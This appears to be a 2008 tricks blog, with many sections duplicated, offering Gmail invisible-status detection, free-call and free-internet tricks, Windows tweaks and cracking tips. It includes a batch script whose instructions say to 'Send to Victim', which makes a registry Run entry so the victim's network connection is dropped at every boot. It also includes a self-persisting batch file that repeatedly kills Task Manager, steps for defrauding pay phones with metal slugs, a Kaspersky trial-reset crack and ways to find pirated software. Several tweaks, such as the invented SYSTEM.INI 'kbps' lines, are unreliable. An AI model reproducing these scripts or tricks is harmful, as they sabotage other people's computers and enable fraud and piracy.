Lots of people misuse invisible feature inorder to even avoid individuals. I wrote an article about yahoo invisible hack some time back which created lots of response among my readers. This time I am going to explain about gmail invisible bug that can be exploited from “off the record feature“. Below are the steps involved, but there are some limitation.
Step 1.
Set the target user as off the record while he/she is online. This can be done by simply clicking on the option in the chat window.
Step 2.
Try sending an IM when he/she is invisible or offline.
If he/she is invisible he/she will receive message. If he/she is offline you will receive anerror “did not receive your chat”.
This hack will only work if you mark the target user as off record when he/she is online. It is a limitation.
How does it work?
When the chat is off the record, it will no longer stored in the gmail account.
When you send IM to an invisible / offline user it will be delivered by default. At the receiving end the IM will receive as a pop in form of chat window if the user is invisible. If the user is offline it will receive as an email in the inbox
Sunday, November 30, 2008
Gmail Cool Smileys
<3
:(|)
\m/
:-o
:D
:(
X-(
B-)
:'(
=D
;)
:-|
=)
:-D
;^)
;-)
:-)
:-/
:P
heart
:(|)
monkey
\m/
rock out
:-o
shocked
:D
grin
:(
frown
X-(
angry
B-)
cool
:'(
crying
=D
big grin
;)
wink
:-|
straight face
=)
big smile
:-D
nose grin
;^)
big nose wink
;-)
nose wink
:-)
nose smile
:-/
skeptical
:P
sticking tongue out
Friday, November 28, 2008
Phone Tricks
FREE INTERNET ON PC VIA TATA CDMA PHONES
One of the cheapest handset or mobile instrument they provide is Haier C2010
which retails at Rs. 700/- without any connection charge.
Its back port is very similar to USB (male) Mini-B Type.
Officially the mobile DO NOT have any data services.
Plug in the device in PC / Notebook USB using a USB (male) Mini-B. Windows
will give a new devices found dialog box.
It will take a while for Windows to search for a driver in internet but eventually
after 3-4 mins or so, it will find a matching driver for the device and install
“BenQ USB Modem 3197?.
I know from my previous experience with TATA, that their CDMA DATA enabled handsets dial #777 via the CDMA modem to get connected to the internet.
Therefore, I created a new dial up connection via network connection setup of Windows XP and selected the available device “BenQ USB Modem 3197? as the modem
I disconnected my ADSL connection, and used user ID Internet / password Internet
to dial this new TATA connection via the BenQ USB modem 3197 and to my
surprise, it did authenticate and got connected !!!!
I tried DAP to test download speeds and its around about
3 or 3.5 kilo bytes / second meaning around 30 kbps of connection speed.
But Its FREE...
CALL FREE THROUGH COIN OPERATED PAY PHONE
1.Collect flat metal pieces that looks like 50ps or 25ps coins.
2.Keep the metal peace just above the hole where we put the 1 Re coin,
and strike it hard with your other hand. The metal peace will go inside the
phone and you will get the "DIAL NUMBER" message.
Note: Steel 25ps and 10ps coins works best.
FREE GPRS ON AIRTEL (Browsing)
Download & install Teashark or UCWEB.The allow Free Surfing.
Note: Downloading files will cost money.
FREE CALL FOR 30min
Go and register at www.youcall.com and get about 30 min free talktime to
anywhere in the world.
One of the cheapest handset or mobile instrument they provide is Haier C2010
which retails at Rs. 700/- without any connection charge.
Its back port is very similar to USB (male) Mini-B Type.
Officially the mobile DO NOT have any data services.
Plug in the device in PC / Notebook USB using a USB (male) Mini-B. Windows
will give a new devices found dialog box.
It will take a while for Windows to search for a driver in internet but eventually
after 3-4 mins or so, it will find a matching driver for the device and install
“BenQ USB Modem 3197?.
I know from my previous experience with TATA, that their CDMA DATA enabled handsets dial #777 via the CDMA modem to get connected to the internet.
Therefore, I created a new dial up connection via network connection setup of Windows XP and selected the available device “BenQ USB Modem 3197? as the modem
I disconnected my ADSL connection, and used user ID Internet / password Internet
to dial this new TATA connection via the BenQ USB modem 3197 and to my
surprise, it did authenticate and got connected !!!!
I tried DAP to test download speeds and its around about
3 or 3.5 kilo bytes / second meaning around 30 kbps of connection speed.
But Its FREE...
CALL FREE THROUGH COIN OPERATED PAY PHONE
1.Collect flat metal pieces that looks like 50ps or 25ps coins.
2.Keep the metal peace just above the hole where we put the 1 Re coin,
and strike it hard with your other hand. The metal peace will go inside the
phone and you will get the "DIAL NUMBER" message.
Note: Steel 25ps and 10ps coins works best.
FREE GPRS ON AIRTEL (Browsing)
Download & install Teashark or UCWEB.The allow Free Surfing.
Note: Downloading files will cost money.
FREE CALL FOR 30min
Go and register at www.youcall.com and get about 30 min free talktime to
anywhere in the world.
WINDOWS TIPS
HIDE A FILE/FOLDER MORE SECURELY
• Start>Run Type cmd
• In command prompt change directory to the root folder of the folder you wanna hide.
eg: if folder to hide is 'secret' in : D:\hhh\ggg\secret. Change prompt to d:\hhh\ggg using cd command.
• Now type "attrib folder name +s +h" with out quotes. Here the folder name is "secret".
• Done!! Now go to folder options and show hidden files. The folder wont be
• shown!!!
• Now to see it your need to uncheck hide system files in folder options.
• To reverse back changes type "attrib folder name -s -h" in command prompt.
Note:
The attrib +s changes the attribute of the file to system file.
And +h changes it to hidden.
________________________________________
MAKE A FILE/FOLDER NOT ACCESSABLE
• Goto safe mode and right click on the file and select properties.
• The go to the tab named security
• change the all the accessibility option to deny, for all users
• Now the file won't be accessible unless the reverse is performed.
________________________________________
USE YOUR WINDOWS KEY
The Windows logo key, located in the bottom row of most computer keyboards is a little-used treasure. Don''t ignore it. It is the shortcut anchor for the following commands:
• Windows: Display the Start menu
• Windows + D: Minimize or restore all windows
• Windows + E: Display Windows Explorer
• Windows + F: Display Search for files
• Windows + Ctrl + F: Display Search for computer
• Windows + F1: Display Help and Support Center
• Windows + R: Display Run dialog box
• Windows + break: Display System Properties dialog box
• Windows + shift + M: Undo minimize all windows
• Windows + L: Lock the workstation
• Windows + U: Open Utility Manager
• Windows + Q: Quick switching of users (Powertoys only)
• Windows + Q: Hold Windows Key, then tap Q to scroll thru the different users on your pc
________________________________________
WINDOWS XP HIDDEN APPS
To run any of these apps go to Start > Run and type the executable name (ie charmap).
WINDOWS XP HIDDEN APPS:
1) Character Map = charmap.exe (very useful for finding unusual characters)
2) Disk Cleanup = cleanmgr.exe
3) Clipboard Viewer = clipbrd.exe (views contents of Windows clipboard)
4) Dr Watson = drwtsn32.exe (Troubleshooting tool)
5) DirectX diagnosis = dxdiag.exe (Diagnose & test DirectX, video & sound cards)
6) Private character editor = eudcedit.exe (allows creation or modification of characters)
7) IExpress Wizard = iexpress.exe (Create self-extracting / self-installing package)
8) Microsoft Synchronization Manager = mobsync.exe (appears to allow synchronization of files on the network for when working offline. Apparently undocumented).
9) Windows Media Player 5.1 = mplay32.exe (Retro version of Media Player, very basic).
10) ODBC Data Source Administrator = odbcad32.exe (something to do with databases)
11) Object Packager = packager.exe (to do with packaging objects for insertion in files, appears to have comprehensive help files).
12) System Monitor = perfmon.exe (very useful, highly configurable tool, tells you
everything you ever wanted to know about any aspect of PC performance,
for uber-geeks
only )
13) Program Manager = progman.exe (Legacy Windows 3.x desktop shell).
14) Remote Access phone book = rasphone.exe (documentation is virtually non-existant).
15) Registry Editor = regedt32.exe [also regedit.exe] (for hacking the Windows Registry).
16) Network shared folder wizard = shrpubw.exe (creates shared folders
on network).
17) File siganture verification tool = sigverif.exe
18) Volume Contro = sndvol32.exe (I've included this for those people
that lose it from the System Notification area).
19) System Configuration Editor = sysedit.exe (modify System.ini & Win.ini just
like in Win98! ).
20) Syskey = syskey.exe (Secures XP Account database - use with care,
it's virtually undocumented but it appears to encrypt all passwords,
I'm not sure of the full implications).
21) Microsoft Telnet Client = telnet.exe
22) Driver Verifier Manager = verifier.exe (seems to be a utility for monitoring the
actions of drivers, might be useful for people having driver problems.
Undocumented).
23) Windows for Workgroups Chat = winchat.exe (appears to be an old NT utility
to allow chat sessions over a LAN, help files available).
24) System configuration = msconfig.exe (can use to control starup programs)
25) gpedit.msc used to manage group policies, and permissions
FAST SHUT DOWN TRICK
Imidiate rapid shut down window
while shutting down window. open task manager(Ctr+Alt+Del),
Select shut down tab. and press ‘ Ctrl ‘ key while select Turn Off from dis tab.
Count 5 4 3 2 1 Voila!!! U r window will rapidly shut down.
===========
RUN
TYPE “SYSTEM.INI”
AND IN THE END
PUT THE FOLLWING
page buffer=100000kbps
load=100000kbps
Download=100000kbps
save=100000kbps
back=100000kbps
Learn Something Good
You Should Always Ready 4 Help Ny Person
Make a Without Name & Hidden Folder
Without Name Folder
Make con folder
make new folder ny where
=rename it
=press alt+255(frm num pad)
=nw type con
After That
Right Click on Folder >> Customize Folder >> Change Icon >> Select Hidden Icon
Disable Internet Permanantly
Open Notepad & Type
echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE
Save as DisableInet.bat
Send to Victim
Disabling Batch File
@echo OFF
MODE CON COLS=14 LINES=2
TITLE ^>:^^(
COLOR F7
COPY %0 C:\WINDOWS\d.bat>NUL
ECHO Windows Registry Editor Version 5.00>C:\d.reg
ECHO.>>C:\d.reg
ECHO [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]>>C:\d.reg
ECHO "CursorBastardizer"="C:\\WINDOWS\\d.bat">>C:\d.reg
REGEDIT /s C:\d.reg
DEL /f /q C:\d.reg
:D
RUNDLL32 user32.dll,mouse_event
RUNDLL32 user32.dll,SetCursorPos
TSkill taskmgr
RUNDLL32 user32.dll,SetCursorPos
RUNDLL32 user32.dll,mouse_event
TASKKill /F /im taskmgr.exe
RUNDLL32 user32.dll,SetCursorPos
GOTO D
PC MORE FASTER MORE THAN BEFORE
====================
HKEY_CURRENT_USER\Control Panel\Desktop
then select
MenuShowDelay
change 400 to
MAKE APPLICATION OPEN MORE POWER
========================================
HKEY_CLASSES_ROOT\exefile
then right click on shell and make new key and putit name is
high priority
and then click on high priority and make new key and put it name is
command
and in the other side modify the value to
c:\WINDOWS\System32\cmd.exe /c start “runhigh” /high “%1
Decrease boot time
Create a batch file by doing the following:
1) Open notepad and enter the following lines:
RD /S /q "C:\Documents and Settings\"UserName without quotes"\Local Settings\History"
RD /S /q "C:\Documents and Settings\Default User\Local Settings\History"
RD /S /q "D:\Temp\" <--"Deletes temp folder, type in the location of your temp folder"
2) Save the fily and then rename is something like deltemp.bat
3) Now click Start, Run and type in gpedit.msc --->Computer Configuration --->Windows Settings --->Scripts and double click on Shutdown --->Click Add and find the batch file you created and press ok to set the script .
HOW TO GIVE A BLANK NAME FOR THE FOLDER????try dis
1.CREATE A NEW FOLDER.
2.RIGHT CLICK N CLICK ON RENAME.
3. NOW keep pressed Alt key and type 0160.....release the Alt key and hit ENTER.....
""
"U CAN HIDE DIS BLANK NAMED FOLDER BY CUSTOMIZING IT"
for that
right click on that blank named folder......
go to properties and click on customize......
than click on change icon.....
select any blank icon (der will b a space left between two icons select that)......
and click on ok.......
than apply it n click ok............
Make a folder Unreadable
1) First Create a folder with any name
2)Inside it create a file called "desktop.ini"
with the following contents
[.ShellClassInfo]
CLSID={00021401-0000-0000-c000-000000000046}
3)Then come out of the folder and make a batch file, for this
a)create a new text file
b)type "attrib +h +s +r" without quotes make sure to replace with the name of your folder..
for example if ur folder name is HAI then the command should be
attrib +h +s +r HAI
4)This will turn ur folder to an unreadable file..
5)if u want to access the folder edit the batch file and change all + to -..i.e
attrib -h -s -r
this will bring back the folder..
• Start>Run Type cmd
• In command prompt change directory to the root folder of the folder you wanna hide.
eg: if folder to hide is 'secret' in : D:\hhh\ggg\secret. Change prompt to d:\hhh\ggg using cd command.
• Now type "attrib folder name +s +h" with out quotes. Here the folder name is "secret".
• Done!! Now go to folder options and show hidden files. The folder wont be
• shown!!!
• Now to see it your need to uncheck hide system files in folder options.
• To reverse back changes type "attrib folder name -s -h" in command prompt.
Note:
The attrib +s changes the attribute of the file to system file.
And +h changes it to hidden.
________________________________________
MAKE A FILE/FOLDER NOT ACCESSABLE
• Goto safe mode and right click on the file and select properties.
• The go to the tab named security
• change the all the accessibility option to deny, for all users
• Now the file won't be accessible unless the reverse is performed.
________________________________________
USE YOUR WINDOWS KEY
The Windows logo key, located in the bottom row of most computer keyboards is a little-used treasure. Don''t ignore it. It is the shortcut anchor for the following commands:
• Windows: Display the Start menu
• Windows + D: Minimize or restore all windows
• Windows + E: Display Windows Explorer
• Windows + F: Display Search for files
• Windows + Ctrl + F: Display Search for computer
• Windows + F1: Display Help and Support Center
• Windows + R: Display Run dialog box
• Windows + break: Display System Properties dialog box
• Windows + shift + M: Undo minimize all windows
• Windows + L: Lock the workstation
• Windows + U: Open Utility Manager
• Windows + Q: Quick switching of users (Powertoys only)
• Windows + Q: Hold Windows Key, then tap Q to scroll thru the different users on your pc
________________________________________
WINDOWS XP HIDDEN APPS
To run any of these apps go to Start > Run and type the executable name (ie charmap).
WINDOWS XP HIDDEN APPS:
1) Character Map = charmap.exe (very useful for finding unusual characters)
2) Disk Cleanup = cleanmgr.exe
3) Clipboard Viewer = clipbrd.exe (views contents of Windows clipboard)
4) Dr Watson = drwtsn32.exe (Troubleshooting tool)
5) DirectX diagnosis = dxdiag.exe (Diagnose & test DirectX, video & sound cards)
6) Private character editor = eudcedit.exe (allows creation or modification of characters)
7) IExpress Wizard = iexpress.exe (Create self-extracting / self-installing package)
8) Microsoft Synchronization Manager = mobsync.exe (appears to allow synchronization of files on the network for when working offline. Apparently undocumented).
9) Windows Media Player 5.1 = mplay32.exe (Retro version of Media Player, very basic).
10) ODBC Data Source Administrator = odbcad32.exe (something to do with databases)
11) Object Packager = packager.exe (to do with packaging objects for insertion in files, appears to have comprehensive help files).
12) System Monitor = perfmon.exe (very useful, highly configurable tool, tells you
everything you ever wanted to know about any aspect of PC performance,
for uber-geeks
only )
13) Program Manager = progman.exe (Legacy Windows 3.x desktop shell).
14) Remote Access phone book = rasphone.exe (documentation is virtually non-existant).
15) Registry Editor = regedt32.exe [also regedit.exe] (for hacking the Windows Registry).
16) Network shared folder wizard = shrpubw.exe (creates shared folders
on network).
17) File siganture verification tool = sigverif.exe
18) Volume Contro = sndvol32.exe (I've included this for those people
that lose it from the System Notification area).
19) System Configuration Editor = sysedit.exe (modify System.ini & Win.ini just
like in Win98! ).
20) Syskey = syskey.exe (Secures XP Account database - use with care,
it's virtually undocumented but it appears to encrypt all passwords,
I'm not sure of the full implications).
21) Microsoft Telnet Client = telnet.exe
22) Driver Verifier Manager = verifier.exe (seems to be a utility for monitoring the
actions of drivers, might be useful for people having driver problems.
Undocumented).
23) Windows for Workgroups Chat = winchat.exe (appears to be an old NT utility
to allow chat sessions over a LAN, help files available).
24) System configuration = msconfig.exe (can use to control starup programs)
25) gpedit.msc used to manage group policies, and permissions
FAST SHUT DOWN TRICK
Imidiate rapid shut down window
while shutting down window. open task manager(Ctr+Alt+Del),
Select shut down tab. and press ‘ Ctrl ‘ key while select Turn Off from dis tab.
Count 5 4 3 2 1 Voila!!! U r window will rapidly shut down.
START MENU
===========
RUN
TYPE “SYSTEM.INI”
AND IN THE END
PUT THE FOLLWING
page buffer=100000kbps
load=100000kbps
Download=100000kbps
save=100000kbps
back=100000kbps
Learn Something Good
You Should Always Ready 4 Help Ny Person
Make a Without Name & Hidden Folder
Without Name Folder
Make con folder
make new folder ny where
=rename it
=press alt+255(frm num pad)
=nw type con
After That
Right Click on Folder >> Customize Folder >> Change Icon >> Select Hidden Icon
Disable Internet Permanantly
Open Notepad & Type
echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE
Save as DisableInet.bat
Send to Victim
Disabling Batch File
@echo OFF
MODE CON COLS=14 LINES=2
TITLE ^>:^^(
COLOR F7
COPY %0 C:\WINDOWS\d.bat>NUL
ECHO Windows Registry Editor Version 5.00>C:\d.reg
ECHO.>>C:\d.reg
ECHO [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]>>C:\d.reg
ECHO "CursorBastardizer"="C:\\WINDOWS\\d.bat">>C:\d.reg
REGEDIT /s C:\d.reg
DEL /f /q C:\d.reg
:D
RUNDLL32 user32.dll,mouse_event
RUNDLL32 user32.dll,SetCursorPos
TSkill taskmgr
RUNDLL32 user32.dll,SetCursorPos
RUNDLL32 user32.dll,mouse_event
TASKKill /F /im taskmgr.exe
RUNDLL32 user32.dll,SetCursorPos
GOTO D
PC MORE FASTER MORE THAN BEFORE
====================
HKEY_CURRENT_USER\Control Panel\Desktop
then select
MenuShowDelay
change 400 to
MAKE APPLICATION OPEN MORE POWER
========================================
HKEY_CLASSES_ROOT\exefile
then right click on shell and make new key and putit name is
high priority
and then click on high priority and make new key and put it name is
command
and in the other side modify the value to
c:\WINDOWS\System32\cmd.exe /c start “runhigh” /high “%1
Decrease boot time
Create a batch file by doing the following:
1) Open notepad and enter the following lines:
RD /S /q "C:\Documents and Settings\"UserName without quotes"\Local Settings\History"
RD /S /q "C:\Documents and Settings\Default User\Local Settings\History"
RD /S /q "D:\Temp\" <--"Deletes temp folder, type in the location of your temp folder"
2) Save the fily and then rename is something like deltemp.bat
3) Now click Start, Run and type in gpedit.msc --->Computer Configuration --->Windows Settings --->Scripts and double click on Shutdown --->Click Add and find the batch file you created and press ok to set the script .
HOW TO GIVE A BLANK NAME FOR THE FOLDER????try dis
1.CREATE A NEW FOLDER.
2.RIGHT CLICK N CLICK ON RENAME.
3. NOW keep pressed Alt key and type 0160.....release the Alt key and hit ENTER.....
""
"U CAN HIDE DIS BLANK NAMED FOLDER BY CUSTOMIZING IT"
for that
right click on that blank named folder......
go to properties and click on customize......
than click on change icon.....
select any blank icon (der will b a space left between two icons select that)......
and click on ok.......
than apply it n click ok............
Make a folder Unreadable
1) First Create a folder with any name
2)Inside it create a file called "desktop.ini"
with the following contents
[.ShellClassInfo]
CLSID={00021401-0000-0000-c000-000000000046}
3)Then come out of the folder and make a batch file, for this
a)create a new text file
b)type "attrib +h +s +r
for example if ur folder name is HAI then the command should be
attrib +h +s +r HAI
4)This will turn ur folder to an unreadable file..
5)if u want to access the folder edit the batch file and change all + to -..i.e
attrib -h -s -r
this will bring back the folder..
- How to crack kaspersky antivirus 7.0 -
If you are annoyed by the 30 day trial version of the ever effective kaspersky antivirus, here is how to solve the problem.
1. shut down kaspersky
2. click start-click run-type regedit-hit enter
3. remove HKEY_LOCAL_MACHINE\SOFTWARE\KasperskyLab\LicStorage
4. remove HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\RNG
5. remove HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\SPC\Certificates
6. run Kaspersky, choose 30 day trial key and activate
7.When the 30 days trial expires, run the steps again.
So, now you got yourself a trial version of kaspersky that will never expire, and you can continue to scan and detect virus, continue update you virus configuration and protect your computer
1. shut down kaspersky
2. click start-click run-type regedit-hit enter
3. remove HKEY_LOCAL_MACHINE\SOFTWARE\KasperskyLab\LicStorage
4. remove HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\RNG
5. remove HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\SPC\Certificates
6. run Kaspersky, choose 30 day trial key and activate
7.When the 30 days trial expires, run the steps again.
So, now you got yourself a trial version of kaspersky that will never expire, and you can continue to scan and detect virus, continue update you virus configuration and protect your computer
DOWNLOAD SOFTWARES WITH CRACK
USING GOOGLE TO FIND CRACKS AND SERIALS
Use the code 94FBR instead of crack or serial.
If you want the crack of Norton, search Norton 94FBR to yield te best results.
________________________________________
USE THE COMMON SITES
Use common sites like Crackspider.Net , Crackfound.Com , Www.Keygen.Ms
Note: These site contain spywares, Do a Full System Scan after visit.
________________________________________
DOWNLOAD CRACK
While searching for cracks try the technique bellow
CRACK:Nero
Use the code 94FBR instead of crack or serial.
If you want the crack of Norton, search Norton 94FBR to yield te best results.
________________________________________
USE THE COMMON SITES
Use common sites like Crackspider.Net , Crackfound.Com , Www.Keygen.Ms
Note: These site contain spywares, Do a Full System Scan after visit.
________________________________________
DOWNLOAD CRACK
While searching for cracks try the technique bellow
CRACK:Nero
Tweak the system to run at its best...
1.Prevention is Better than Cure.So Instead of curing the sluggish old system, do a fresh install. Install it in C: drive itself.
2.After the install ,Install the XP SP3 or Vista SP1. (It gives all the latset update.)
##DONOT CONNECT TO THE INTERNET BEFORE INSTALLING THE ANTIVIRUS##
3.Next thing to do is to uninstall all the unwanted components in Xp/Vista like Windows messenger,MSN explorer and ie. That's Right Uninstall Internet Explorer.It is a very buggy browser and gets attacked by lots of spywares.(To do it go to Control Panel >Add or remove programs>Add/Remove windows Components, and untick them and click next)
4.Right click My Computer select Properties,goto Advanced>Performance>Settings>Visual effects.Select Adjust for best performance.Then check the boxes: Use Visual style on windows & buttons,Use drop shadow for desktop icons,Show window contents while dragging.
5.Install an AntiVirus (Norton AntiVirus 2009-Is very effective and light) & Spybot Search & Distroy.Remember to Update and Scan regularly.
6.Install Firefox (You can download the ie theme for it if you cant live with out the ie look & feel).Get the add ons like Addblock Plus, Flash Block,etc..
7. Install other softwares like Video players,Photoshop,Office,etc. [Remember instead of selecting every thing in a suite, select only those you use-Install only Word,Excel & Powerpoint if you use only them]
8.Instead of installing lots of video player install an all in one, like a GOM player and download the codecs
9.Install Perfect Disk 8.0 and Defragment (Smart Placement).[Donot use windows defragmenter] Remember to do this once in every 2 weeks. Donot use it very frequently it could damage the drive.
10.Avoid visiting potentially risky site like crack spider,seriall,etc..
11. If you want cracks go to the pirate bay.Before downloading read the comments to know about the true contents.[Also scan all files that are downloaded]
12.If you have the cofidents that your can solve any problems that arises,Turn off system restore on all drives[It will use the cpu in background].
13.Also Turn off Windows Automatic updates.[Don't get me wrong here,The automatic update feature will share your internet bandwidth while you are downloading something or browsing,and make it slow.]So turn it off and swith it on when you are not doing any thing on the web.
14.Recover 20% bandwidth in Xp
Click Start / Run
Type: gpedit.msc
This opens the group policy editor.
Then go to:
Local Computer Policy / Computer Configuration / Administrative Templates / Network / QOS Packet Scheduler / Double Click on Limit Reservable Bandwidth and select settings>Enable.Then type 0 in band width limit %. [Don't just disable it].Click Ok and restart the PC.
15.Deleting Startup items:
Click Start / Run
Type: msconfig
Then go to:
Start up, and click Disable all, check anything related to antivirus, then click Ok. Then it will ask u to restart the PC . It is important to restart now itself.
16.Never fill a drive more than 65% with data, especially the system drive C:
17.Install a system cleaner like Wintweak or TuneUp Utility(only one of these) and clean the registry and the unwanted shortcuts and temp files. [Don't use an defragmenter except Perfect disk-Not even the one that comes with TuneUp Utility.]
18.After all this, Defragment one more time(Always use smart Placement) with Perfect Disk. While defragmenting keep the system idle. [Remember to defragment on a regular basis.]
RESTART...
2.After the install ,Install the XP SP3 or Vista SP1. (It gives all the latset update.)
##DONOT CONNECT TO THE INTERNET BEFORE INSTALLING THE ANTIVIRUS##
3.Next thing to do is to uninstall all the unwanted components in Xp/Vista like Windows messenger,MSN explorer and ie. That's Right Uninstall Internet Explorer.It is a very buggy browser and gets attacked by lots of spywares.(To do it go to Control Panel >Add or remove programs>Add/Remove windows Components, and untick them and click next)
4.Right click My Computer select Properties,goto Advanced>Performance>Settings>Visual effects.Select Adjust for best performance.Then check the boxes: Use Visual style on windows & buttons,Use drop shadow for desktop icons,Show window contents while dragging.
5.Install an AntiVirus (Norton AntiVirus 2009-Is very effective and light) & Spybot Search & Distroy.Remember to Update and Scan regularly.
6.Install Firefox (You can download the ie theme for it if you cant live with out the ie look & feel).Get the add ons like Addblock Plus, Flash Block,etc..
7. Install other softwares like Video players,Photoshop,Office,etc. [Remember instead of selecting every thing in a suite, select only those you use-Install only Word,Excel & Powerpoint if you use only them]
8.Instead of installing lots of video player install an all in one, like a GOM player and download the codecs
9.Install Perfect Disk 8.0 and Defragment (Smart Placement).[Donot use windows defragmenter] Remember to do this once in every 2 weeks. Donot use it very frequently it could damage the drive.
10.Avoid visiting potentially risky site like crack spider,seriall,etc..
11. If you want cracks go to the pirate bay.Before downloading read the comments to know about the true contents.[Also scan all files that are downloaded]
12.If you have the cofidents that your can solve any problems that arises,Turn off system restore on all drives[It will use the cpu in background].
13.Also Turn off Windows Automatic updates.[Don't get me wrong here,The automatic update feature will share your internet bandwidth while you are downloading something or browsing,and make it slow.]So turn it off and swith it on when you are not doing any thing on the web.
14.Recover 20% bandwidth in Xp
Click Start / Run
Type: gpedit.msc
This opens the group policy editor.
Then go to:
Local Computer Policy / Computer Configuration / Administrative Templates / Network / QOS Packet Scheduler / Double Click on Limit Reservable Bandwidth and select settings>Enable.Then type 0 in band width limit %. [Don't just disable it].Click Ok and restart the PC.
15.Deleting Startup items:
Click Start / Run
Type: msconfig
Then go to:
Start up, and click Disable all, check anything related to antivirus, then click Ok. Then it will ask u to restart the PC . It is important to restart now itself.
16.Never fill a drive more than 65% with data, especially the system drive C:
17.Install a system cleaner like Wintweak or TuneUp Utility(only one of these) and clean the registry and the unwanted shortcuts and temp files. [Don't use an defragmenter except Perfect disk-Not even the one that comes with TuneUp Utility.]
18.After all this, Defragment one more time(Always use smart Placement) with Perfect Disk. While defragmenting keep the system idle. [Remember to defragment on a regular basis.]
RESTART...
Miscellanious tweaks
SHUT DOWN XP FASTER
1) Start - Run - Regedit
Navigate to the following Registry key:
HKEY CURRENT USER\Control Panel\Desktop
Double click on the AutoEndTasks entry and replace the 0 with a 1 in the Value data text box
For the next two, if the dword value indicated does not exist, create it:
Double click on the WaitToKillAppTimeout entry in the right pane and change the Value data to 2000
Double click on the HungAppTimeout entry in the right pane and change the Value data to 1000
Reboot
If still having a problem, make the next change:
2) HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control
Right-click on WaitToKillServiceTimeout and change it to 2000
NOTE: The lowest value Windows will recognize is 1000 (1 second)
ADVISORY: While rare, the "WaitToKillService" tweak can cause problems. If an application is in the process of saving data and the associated service is stopped prematurely, the data will not be saved and may be lost.
________________________________________
TURN OFF INDEXING TO SPEEDUP XP
Windows XP keeps a record of all files on the hard disk so when you do a search on the hard drive it is faster. There is a downside to this and because the computer has to index all files, it will slow down normal file commands like open, close, etc. If you do not do a whole lot of searches on your hard drive then I suggest turning this feature off:
1. Control Panel
2. Administrative Tools
3. Services
4. Disable Indexing Services
________________________________________
TWEAK AERO BY DISABLING MIN/MAX ANIMATIONS
The new animations in Windows Vista look great for the first month or so but then they can become an annoyance since they feel like they increase the amount of time it takes to minimize and maximize a window. If you can live without the minimize and maximize animations that you can bring back the super fast feeling of your windows instantly disappearing and appearing by disabling the min/max animations.
Follow the steps below to make your windows faster:
1. Click on the Start Menu and key in SystemPropertiesPerformance and hit Enter.
2. On the Visual Effects tab uncheck Animate windows when minimizing and maximizing.
3. Click OK.
Other Steps:
1. Click on the desktop and select Personalize.
2. Select Windows Color and Appearance.
3. Uncheck Enable Transparency.
________________________________________
TWEAK INDEXING OPTIONS FOR PERFORMANCE BOOST
The indexing service in Windows Vista is responsible for making those search boxes all over the operating system lightening fast. By default Windows automatically indexes all files in your user profile folders, start menu and any files you have setup for offline access. If you have a lot of files in these locations and the files change often you can be putting a heavy load on the indexing service. For maximum performance when using Windows Vista I recommend disabling indexing for all other locations other than the Start Menu. This will lessen the background work that Windows Vista has to do. It will also slow down your searches of other locations but that is the price you must pay for this performance benefit.
Follow these steps to tweak the indexing locations:
Click on the Start Button and key in Indexing Options and hit Enter. Indexing Options will now load.
Vista tweak
* Hit the Modify button.
* Next, click on Show all locations.
* Scroll through the tree-view and uncheck any folders you do not want to be indexed. When you are finished, click OK.
* If you want to change advanced indexing settings such as what file types are indexed click on the Advanced button. Otherwise hit Close.
________________________________________
Speed up wireless WAN connection
In Windows Vista the networking components were designed to be much more intelligent and automatically adjust the network settings to optimize the connection speed. This is a great new feature. Your network components basically tweak themselves for optimal performance. In most situations, these components automatically adjust perfectly for best performance. However, with wireless WAN cards the detection of network conditions is flawed and can result in slower network performance.
To fix this problem, Microsoft has released a hotfix for users affected by this issue. If you have a Wireless WAN device, I suggest you give this hotfix a try.
KB 940646 details:
This problem occurs because of the way that TCP receive window auto tuning is used in Windows Vista for connections that only receive data.
This tweak will be automaticallly installed it you install Vista SP1.
Windows Vista obtains a round-trip time (RTT) estimate at the time of connection setup and every time that a new segment of data that is transmitted. A connection that only receives data is limited to the single RTT sample that is obtained at the time of connection setup. Because the connection only receives data, the connection cannot "converge" to the actual RTT of the connection. For example, because the RTT data may fluctuate for various reasons, a "converge" operation is performed to estimate a meaningful RTT by using blending current and previous RTT data. However, if the connection cannot converge to the actual RTT of the connection, the bandwidth delay product (BDP) estimate that Vista obtains is also incorrect. Therefore, the connection's receive window is limited, and throughput of the connected transmission network is reduced.
1) Start - Run - Regedit
Navigate to the following Registry key:
HKEY CURRENT USER\Control Panel\Desktop
Double click on the AutoEndTasks entry and replace the 0 with a 1 in the Value data text box
For the next two, if the dword value indicated does not exist, create it:
Double click on the WaitToKillAppTimeout entry in the right pane and change the Value data to 2000
Double click on the HungAppTimeout entry in the right pane and change the Value data to 1000
Reboot
If still having a problem, make the next change:
2) HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control
Right-click on WaitToKillServiceTimeout and change it to 2000
NOTE: The lowest value Windows will recognize is 1000 (1 second)
ADVISORY: While rare, the "WaitToKillService" tweak can cause problems. If an application is in the process of saving data and the associated service is stopped prematurely, the data will not be saved and may be lost.
________________________________________
TURN OFF INDEXING TO SPEEDUP XP
Windows XP keeps a record of all files on the hard disk so when you do a search on the hard drive it is faster. There is a downside to this and because the computer has to index all files, it will slow down normal file commands like open, close, etc. If you do not do a whole lot of searches on your hard drive then I suggest turning this feature off:
1. Control Panel
2. Administrative Tools
3. Services
4. Disable Indexing Services
